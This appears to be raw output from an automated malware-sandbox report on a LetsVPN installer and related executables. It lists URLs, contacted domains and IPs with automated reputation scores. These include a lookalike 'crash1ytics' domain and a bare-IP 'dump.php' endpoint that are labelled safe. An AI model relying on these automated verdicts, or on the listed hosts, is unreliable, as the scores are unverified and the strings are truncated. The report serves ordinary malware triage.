              http://foo/Themes/TextBoxDictionary.xaml0%Avira URL Cloudsafe
              http://logging.apache.org/log4net/release/faq.html#trouble-EventLog0%Avira URL Cloudsafe
              https://d1dmgcawtbm6l9.cloudfront.net/rest-apiinvalid0%Avira URL Cloudsafe
              http://foo/Themes/ScrollViewDictionary.xamld0%Avira URL Cloudsafe
              http://schemas.fontawesome.io/icons/0%Avira URL Cloudsafe
              https://nit.crash1ytics.comx0%Avira URL Cloudsafe
              http://icsharpcode.net/sharpdevelop/avalonedit#ICSharpCode.AvalonEdit.HighlightingQ0%Avira URL Cloudsafe
              https://in.appcenter.ms./logs?api-version=1.0.00%Avira URL Cloudsafe
              http://foo/bar/themes/textboxdictionary.bamld0%Avira URL Cloudsafe
              http://wpfanimatedgif.codeplex.com0%Avira URL Cloudsafe
              http://foo/bar/themes/radiobuttondictionary.bamld0%Avira URL Cloudsafe
              http://home.pacific.net.sg/~jupboo0%Avira URL Cloudsafe
              http://www.atomixbuttons.com/textcalc0%Avira URL Cloudsafe
              http://defaultcontainer/LetsPRO;component/Themes/TextBoxDictionary.xaml0%Avira URL Cloudsafe
              http://rcd.video.sina.com.cn/realtime_pcdesktop0%Avira URL Cloudsafe
              https://1wm27s.onelink.me/DPiD/s5eizipo-10%Avira URL Cloudsafe
              http://icsharpcode.net/sharpdevelop/avalonedit#ICSharpCode.AvalonEdit.Highlighting0%Avira URL Cloudsafe
              http://www.winimage.com/zLibDllnetwork_change0%Avira URL Cloudsafe
              http://www.xmlspy.com)0%Avira URL Cloudsafe
              http://fontawesome.iohttp://fontawesome.io/license/Copyright0%Avira URL Cloudsafe
              http://rcd.video.sina.com.cn/realtime_pcdesktop?app=pcClient&type=crash&clientType=0&machineCode=0%Avira URL Cloudsafe
              https://nit.crash1ytics.comhttpCode=-20%Avira URL Cloudsafe
              http://rcd.video.sina.com.cn/realtime_pcdesktop?app=pcClient&type=crash&clientType=0&machineCode=htt0%Avira URL Cloudsafe
              http://defaultcontainer/LetsPRO;component/Themes/RadioButtonDictionary.xamld0%Avira URL Cloudsafe
              http://foo/app.xamld0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              nal.fqoqehwib.com
              		33.86.72.19
              		truefalse
                		high
                www.wshifen.com
                		103.235.46.96
                		truefalse
                  		high
                  d1dmgcawtbm6l9.cloudfront.net
                  		13.227.9.24
                  		truefalse
                    		unknown
                    socket-ap1-ingress-1471706552.ap-southeast-1.elb.amazonaws.com
                    		18.136.85.30
                    		truefalse
                      		high
                      www.google.com
                      		172.217.21.36
                      		truefalse
                        		high
                        nit.crash1ytics.com
                        		67.137.174.254
                        		truefalse
                          		high
                          yandex.com
                          		77.88.55.88
                          		truefalse
                            		high
                            chr.alipayassets.com
                            		85.222.79.57
                            		truefalse
                              		high
                              in.appcenter.ms
                              		unknown
                              		unknownfalse
                                		high
                                ws-ap1.pusher.com
                                		unknown
                                		unknownfalse
                                  		high
                                  www.yandex.com
                                  		unknown
                                  		unknownfalse
                                    		high
                                    www.baidu.com
                                    		unknown
                                    		unknownfalse
                                      		high

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Textletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/ws/2005/02/sc/sctletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://github.com/myuser/myrepoletsvpn-latest.exe, 00000015.00000003.2393237093.0000000003106000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2345688003.0000000003103000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://intercom.help/letsvpn-world/en/articles/2907649-%E9%80%9A%E8%BF%87%E7%94%B3%E8%BF%B0%E6%89%Bletsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://github.com/CommunityToolkit/WindowsCommunityToolkitOletsvpn-latest.exe, 00000015.00000003.2371393124.000000000310F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/ValidateFinalletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/ValidateFinalwletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://defaultcontainer/LetsPRO;component/Themes/TabControllerDictionary.xamldLetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTRC/IssueFinalletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://intercom.help/letsvpn-world/en/articles/2922442-%D1%87%D1%82%D0%BE-%D0%B4%D0%B5%D0%BB%D0%B0%letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://foo/Themes/TextBoxDictionary.xamlLetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2004/08/addressingzhttp://docs.oasis-open.org/ws-sx/ws-secureconversatletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordTextletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://foo/Themes/TabControllerDictionary.xamlLetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://logging.apache.org/log4net/release/faq.html#trouble-EventLogletsvpn-latest.exe, 00000015.00000003.2524906073.000000000310E000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000002.2710768941.00000000054F2000.00000002.00000001.01000000.0000001C.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/SCTletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovinceletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://docs.oasis-open.org/wsfed/authorization/200706letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claimproperties/namequalifierletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://foo/bar/themes/tabcontrollerdictionary.bamldLetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Cancelletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueTletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.oletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issueletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/ValidateTletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.hardcodet.net/taskbarletsvpn-latest.exe, 00000015.00000003.2351020724.0000000003102000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmp, LetsPRO.exe, 0000003D.00000002.3395428987.00000000024D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://d1dmgcawtbm6l9.cloudfront.net/rest-apiinvalidletsvpn-latest.exe, 00000015.00000003.2520982126.00000000031F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://docs.oasis-open.org/ws-sx/ws-trust/200512/Issueletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://foo/bar/themes/windowdictionary.bamlLetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://intercom.help/letsvpn-world/en/articles/8262897-%D1%81%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%Dletsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.oletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://nuget.org/nuget.exepowershell.exe, 0000001B.00000002.2594140593.0000000005789000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://125.211.213.34/dump.phpsinaplayer_service.exe, sinaplayer_service.exe, 00000013.00000000.2209995817.000000000053D000.00000002.00000001.01000000.0000000B.sdmp, sinaplayer_service.exe, 00000013.00000002.3388043166.000000000053D000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/webpageletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/SCTletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://defaultcontainer/LetsPRO;component/Themes/ScrollViewDictionary.xamldLetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/SCT-Cancelletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://intercom.help/letsvpn-world/en/collections/Killerletsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                                                          		high
                                                                                                          http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/RenewFinalvhttp://docs.oasis-open.org/ws-sx/wsletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://nit.crash1ytics.comxLetsPRO.exe, 0000003D.00000002.3424803867.000000000EEAE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://schemas.fontawesome.io/icons/letsvpn-latest.exe, 00000015.00000003.2350184994.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmp, LetsPRO.exe, 0000003D.00000002.3395428987.00000000024D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://in.appcenter.ms./logs?api-version=1.0.0letsvpn-latest.exe, 00000015.00000003.2369093669.000000000310B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://intercom.help/letsvpn-world/en/articles/3081101-adjust-the-settings-for-ipv6letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                                                              		high
                                                                                                              http://foo/Themes/ScrollViewDictionary.xamldLetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://www.atomixbuttons.com/textcalcletsVPN.exe, 00000000.00000002.2240005982.0000000140081000.00000002.00000001.01000000.00000003.sdmp, letsVPN.exe, 00000000.00000000.2132205568.0000000140081000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://foo/bar/themes/textboxdictionary.bamldLetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2590832104.0000000004721000.00000004.00000800.00020000.00000000.sdmp, LetsPRO.exe, 0000003D.00000002.3395428987.00000000024D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://wpfanimatedgif.codeplex.comletsvpn-latest.exe, 00000015.00000003.2513494263.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RST/RenewTletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://icsharpcode.net/sharpdevelop/avalonedit#ICSharpCode.AvalonEdit.HighlightingQletsvpn-latest.exe, 00000015.00000003.2352114533.000000000310F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://intercom.help/letsvpn-world/en/collections/1611781-%E4%B8%AD%E6%96%87%E5%B8%AE%E5%8A%A9letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsshttp://schemas.xmlsoap.org/ws/2005/05/idenletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifierletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001B.00000002.2590832104.0000000004876000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001B.00000002.2590832104.0000000004876000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://intercom.help/letsvpn-world/en/articles/8262801-special-settings-for-killer-network-serviceletsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://foo/bar/themes/radiobuttondictionary.bamldLetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://contoso.com/Iconpowershell.exe, 0000001B.00000002.2594140593.0000000005789000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://intercom.help/letsvpn-world/en/articles/8262818-%D1%81%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%Dletsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://crl.ver)svchost.exe, 0000000D.00000003.2264464231.0000020B584A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3396071595.0000020B584AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://github.com/dotnetprojects/SVGImageletsvpn-latest.exe, 00000015.00000003.2387449334.0000000003101000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishedname_urn:oasis:names:tc:xacmlletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://home.pacific.net.sg/~jupbooletsVPN.exe, 00000000.00000002.2240005982.0000000140081000.00000002.00000001.01000000.00000003.sdmp, letsVPN.exe, 00000000.00000000.2132205568.0000000140081000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          https://github.com/Pester/Pesterpowershell.exe, 0000001B.00000002.2590832104.0000000004876000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://rcd.video.sina.com.cn/realtime_pcdesktopsinaplayer_service.exefalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            http://defaultcontainer/LetsPRO;component/Themes/TextBoxDictionary.xamlLetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/countryletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://fontawesome.iohttp://fontawesome.io/license/Copyrightletsvpn-latest.exe, 00000015.00000003.2350184994.0000000003107000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claimproperties/attributenameletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://developers.google.com/analytics/devguides/collection/protocol/ga4/user-properties?client_typletsvpn-latest.exe, 00000015.00000003.2357553464.0000000003108000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://rcd.video.sina.com.cn/realtime_pcdesktop?app=pcClient&type=crash&clientType=0&machineCode=sinaplayer_service.exe, sinaplayer_service.exe, 00000013.00000000.2209995817.000000000053D000.00000002.00000001.01000000.0000000B.sdmp, sinaplayer_service.exe, 00000013.00000002.3388043166.000000000053D000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://intercom.help/letsvpn-world/en/collections/1627706-%D0%BF%D0%BE%D0%BC%D0%BE%D1%89%D1%8C-%D1%letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000001B.00000002.2590832104.0000000004876000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://intercom.help/letsvpn-world/en/articles/2780068-%E5%A6%82%E4%BD%95%E4%B8%8B%E8%BD%BD%E5%BE%9letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://1wm27s.onelink.me/DPiD/s5eizipo-1letsvpn-latest.exe, 00000015.00000002.2781360538.0000000000696000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2227804272.000000000275F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCTwhttp://schemas.xmlsoap.org/ws/2005/02/trust/RSTletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://www.xmlspy.com)letsvpn-latest.exe, 00000015.00000003.2405745648.000000000310B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://intercom.help/letsvpn-world/en/articles/2907458-%E6%8F%90%E7%A4%BA%E7%BB%91%E5%AE%9A%E8%AE%Bletsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Cancelletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Cancelletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://docs.oasis-open.org/ws-sx/ws-trust/200512/Issuelhttp://docs.oasis-open.org/ws-sx/ws-trust/200letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://icsharpcode.net/sharpdevelop/avalonedit#ICSharpCode.AvalonEdit.Highlightingletsvpn-latest.exe, 00000015.00000003.2352114533.000000000310F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2009/09/identity/claims/actorletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://rcd.video.sina.com.cn/realtime_pcdesktop?app=pcClient&type=crash&clientType=0&machineCode=httsinaplayer_service.exe, 00000013.00000000.2209995817.000000000053D000.00000002.00000001.01000000.0000000B.sdmp, sinaplayer_service.exe, 00000013.00000002.3388043166.000000000053D000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    http://www.winimage.com/zLibDllnetwork_changesinaplayer_service.exe, 00000013.00000000.2209995817.000000000053D000.00000002.00000001.01000000.0000000B.sdmp, sinaplayer_service.exe, 00000013.00000002.3388043166.000000000053D000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://intercom.help/letsvpn-world/en/collections/1628560-help-documentsletsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmp, LetsPRO.exe, 0000003D.00000002.3395428987.00000000024D1000.00000004.00000800.00020000.00000000.sdmpfalse
